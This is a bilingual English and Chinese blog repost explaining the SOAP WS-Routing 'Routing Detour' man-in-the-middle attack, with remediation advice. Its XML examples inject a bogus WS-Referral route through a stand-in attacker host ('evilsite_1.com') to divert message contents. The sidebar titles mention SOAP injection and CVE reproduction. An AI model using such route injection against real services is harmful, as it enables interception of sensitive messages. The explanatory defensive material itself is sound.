soap漏洞_SOAP路由绕行漏洞

最新推荐文章于 2023-07-20 17:19:52 发布
最新推荐文章于 2023-07-20 17:19:52 发布
阅读量1.1k 收藏
点赞数
文章标签: java http 安全 分布式 https
原文链接:https://habr.com/en/post/467681/
版权

soap漏洞

描述 ( Description )

The WS-Routing Protocol is a protocol for exchanging SOAP messages from an initial message sender to receiver, typically via a set of intermediaries. The WS-Routing protocol is implemented as a SOAP extension, and is embedded in the SOAP Header. WS-Routing is often used to provide a way to direct XML traffic through complex environments and transactions by allowing interim way stations in the XML path to assign routing instructions to an XML document.

WS-Routing Protocol是WS路由协议,通常用于通过一组中介从初始消息发送方到接收方交换SOAP消息的协议。 WS-Routing协议实现为SOAP扩展,并嵌入在SOAP Header中。 WS-Routing通常用于通过允许XML路径中的临时路径站将路由指令分配给XML文档来通过复杂的环境和事务来引导XML流量。

Taking a minimalist approach, WS-Routing encapsulates a message path within a SOAP message, so that the message contains enough information to be sent across the Internet using transports like TCP and UDP while supporting:

WS-Routing采用一种极简主义的方法,将消息路径封装在SOAP消息中,以便该消息包含足够的信息,可以使用TCP和UDP等传输器通过Internet发送,同时支持:

  • The SOAP message path model,

    SOAP消息路径模型,
  • Full-duplex, one-way message patterns,

    全双工单向消息模式,
  • Full-duplex, request-response message patterns, and

    全双工请求响应消息模式,以及
  • Message correlation.

    消息关联。

Routing Detours are a type of «Man in the Middle» attack where Intermediaries can be injected or «hijacked» to route sensitive messages to an outside location. Routing information (either in the HTTP header or in WS-Routing header) can be modified en route and traces of the routing can be removed from the header and message such that the receiving application none the wiser that a routing detour has occurred. 

绕行路由是“中间人”攻击的一种,其中可以注入或“劫持”中间人,以将敏感消息路由到外部位置。 可以在途中修改路由信息(在HTTP标头中或在WS-Routing标头中),并且可以从标头和消息中删除路由的痕迹,这样接收应用程序就不会更明智地发生路由de回。

主要问题 ( Primary issue )

The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents)

攻击者将一个虚假的路由节点(使用WS-Referral服务)注入到“探索”阶段中标识的SOAP消息的XML标头的路由表中。 因此,攻击者可以将XML消息路由到攻击者控制的节点(并访问消息内容)

基于WS-Referral的虚假节点路由的WS-Routing注入示例 ( Example of WS-Referral based WS-Routing injection of the bogus node route )
<r:ref xmlns:r="http://schemas.example.com/referral">
<r:for>
<r:prefix>http://example_2.com/router</r:prefix>
</r:for>
<r:if/>
<r:go>
<r:via>http://evilsite_1.com/router</r:via>
</r:go>
</r:ref>
导致路由绕行攻击 ( Resulting Routing Detour attack)
<S:Envelope>
<S:Header>
<m:path
xmlns:m="http://schemas.example.com/rp/"
S:actor="http://schemas.example.com/soap/actor"
S:mustUnderstand="1">
<m:action>http://example_0.com/</m:action>
<m:to>http://example_4.com/router</m:to>
<m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
<m:fwd>
<m:via>http://example_2.com/router</m:via>
<m:via>http://evilesite_1.com/router</m:via>
<m:via>http://example_3.com/router</m:via>
</m:fwd>
<m:rev />
</m:path>
</S:Header>
<S:Body>
...
</S:Body>
</S:Envelope>
后果 ( Consequence )

Thus, using Routing Detour, the attacker can route the XML message to a hacker controlled node (and access to the message contents).

因此,使用路由绕行,攻击者可以将XML消息路由到受黑客控制的节点(并访问消息内容)。

一般修复 ( General Remediation )

Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.

设计:指定请求的最大中间节点数,并要求具有相互认证的SSL连接。

Implementation: Use SSL for connections between all parties with mutual authentication

实施:使用SSL进行相互认证的各方之间的连接

翻译自: https://habr.com/en/post/467681/

soap漏洞

cullen2012
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于SOAP消息组合变异的web服务漏洞测试
04-27
基于SOAP消息组合变异的web服务漏洞测试 相关知识
Soap注入漏洞发现
weixin_38023368的博客
09-04 1864
漏洞发现: 打开ZoomEye,搜索:“asmx country:cn”。 点进去一个IP:加端口。例如: 然后随意打开里面一文件 然后在改页面后面添加”?WSDL”,如图: 打开WVS扫描器: 按照下面步骤: 将上面的URL输入到WSDL URL框里: 一路next 开始扫描,发现了一个SQL注入。 如图: 至此,我们发现了SQL注入漏洞,如果没有发现别灰心,还有其他的asmx文件夹,也可以按照上面的方法,一个一个试。 有些网站多的话,10个8个as..
解决cxf Available SOAP services暴漏其他接口
J.G.Darkd
06-30 3625
[code="java"] CXFServlet org.apache.cxf.transport.servlet.CXFServlet Hides the listing of available services when set to true. It is considered a security...
从2022安洵杯[babyPHP]看Soap+CLRF造成SSRF漏洞
Aiwin的博客
11-28 2533
Soap+CLRF组合拳造成SSRF漏洞以及例题2022安洵杯 BabyPHP、[LCTF 2018]bestphp's revenge。
PHP SOAP解析器信息泄露漏洞
weixin_30292745的博客
03-07 274
漏洞名称: PHP SOAP解析器信息泄露漏洞 CNNVD编号: CNNVD-201303-093 发布时间: 2013-03-07 更新时间: 2013-03-07 危害等级: 中危 漏洞类型: 信息泄露 威胁类型: 远程 CVE编号: CVE-2013-1643 ...
soap2.0.rar_soap_soap toolkit_soap2.0
09-20
4. **SOAP Header**:Header元素是非必需的,但可以用于添加扩展功能,如安全、事务处理或路由信息。它允许服务提供商和消费者之间传递元数据,而不干扰消息主体。 5. **SOAP Body**:Body元素是SOAP消息的核心,它...
soap.rar_SOA_SOAP java_java soap_soap
09-20
标题中的"soap.rar_SOA_SOAP_java_java_soap_soap"揭示了主要的主题是SOAP(简单对象访问协议)技术,它在服务导向架构(SOA)中扮演着关键角色,并与Java编程语言紧密关联。SOAP是一种基于XML的协议,用于在分布式...
SOAP_serialization.zip_Csharp SOAP_soap_soap C++_soap csharp
09-23
9. **SOAP_csharp**:在C#中,使用`System.ServiceModel`命名空间可以创建WCF(Windows Communication Foundation)服务,它提供了比ASP.NET Web服务更强大的功能,也支持SOAP协议。 10. **调试和测试SOAP服务**:...
SOAP.zip_Csharp SOAP_class A_soap
09-24
描述中提到的"A_soap"可能是指在C#中实现SOAP操作的一种特定方式或策略。具体实现可能包括自定义消息处理、错误处理、数据序列化和反序列化等。 接下来,让我们关注`ProcessSOAP`这个文件。它可能是实现Web服务实际...
soap协议请求与分析.rar_ Soap_SOAP java_WSDL_java soap_soap
09-22
SOAP(Simple Object Access Protocol)协议是一种轻量级的、基于XML的协议,用于在Web服务中交换结构化和类型化的信息。它允许不同系统间的应用程序通过网络进行通信,不依赖特定的操作系统或编程语言。SOAP协议...
Web+Services+Testing+with+soapUI(英文,慎下)
07-24
web services testing soapUI,接口测试
(39.3)【XML漏洞专题】XML注入——查找、注入、防止SOAP
08-20 2032
【XML漏洞专题】XML注入——查找、注入、防止SOAP
【技术分享】针对SOAP的渗透测试与防护
baynk的博客
04-12 2514
本文翻译自:https://blog.securelayer7.net/owasp-top-10-penetration-testing-soap-application-mitigation/ SOAP概述 简单对象访问协议(SOAP)是连接或Web服务或客户端和Web服务之间的接口。SOAP通过应用层协议(如HTTP,SMTP或甚至TCP)进行操作,用于消息传输。 图1 SOAP操...
SOAP注入
hackzkaq的博客
03-21 5218
零基础学黑客,搜索公众号:白帽子左一 soap 注入简介 soap注入就是在webservicesoap协议,连接web服务和客户端的接口处的注入,通过在发送的soap消息参数内添加注入语句来达到注入效果,常见的有sql注入,也有xml注入,代码注入 什么是soap 首先介绍webservice,webservice是一种跨平台,跨语言的规范,用于不同平台,不同语言间的交互,webservice有三要素,分别为soap,wsdl和uddl,uddl用于提供发布和查询webservice方法,wsdl是
常见漏洞修复方案
Guoke324的博客
09-09 9728
常见漏洞修复方案,漏洞修复
漏洞复现】SOAP WSDL解析器代码注入漏洞(CVE-2017-8759)
VI___
01-10 4572
一、CVE-2017-8759 ——类型:.NET Framework漏洞 https://www.freebuf.com/articles/system/147602.html 二、准备 攻击机:kali-2019 192.168.75.149 靶机:win7_x86(关闭防火墙) 192.168.75.139 三、复现过程 1、下载 exp,并将 cm...
自我认为挺全面的【Web Service渗透测试总结】
HBohan的博客
02-18 727
Web Service是一个平台独立的、低耦合的、自包含的、基于可编程的Web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。
接口漏洞-WebService-wsdl+SOAP-Swagger+HTTP-WebPack
最新发布
xiaoheizi的博客
07-20 3993
接口就是位于复杂系统之上并且能简化你的任务,它就像一个中间人让你不需要了解详细的所有细节。像谷歌搜索系统,它提供了搜索接口,简化了你的搜索任务。再像用户登录页面,我们只需要调用我们的登录接口,我们就可以达到登录系统的目的。 接口拥有各种功能,如:文件上传,查询,添加,删除,登录等等。我们就可以在这些接口上测试该功能漏洞
解决cxf Available SOAP services接口的时隐藏接口页面
qingfeng2556的博客
03-21 8266
正常情况下,发布cxf后都会出现 Available SOAP services的页面,这个页面会把所有接口都暴露出来,甚至具体参数类型。 为解决这个问题,只需在web.xml中配置 CXFService org.apache.cxf.transport.servlet.CXFServlet hide-service-list-page用来隐藏服务列表页 true
soap_register_plugin
06-07
bool soap_register_plugin ( string $name , string $class_name ) ``` 其中,`$name`是插件的名称,`$class_name`是插件类的名称。插件类必须实现`SoapServerPlugin`接口。该函数返回一个布尔值,表示是否注册...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值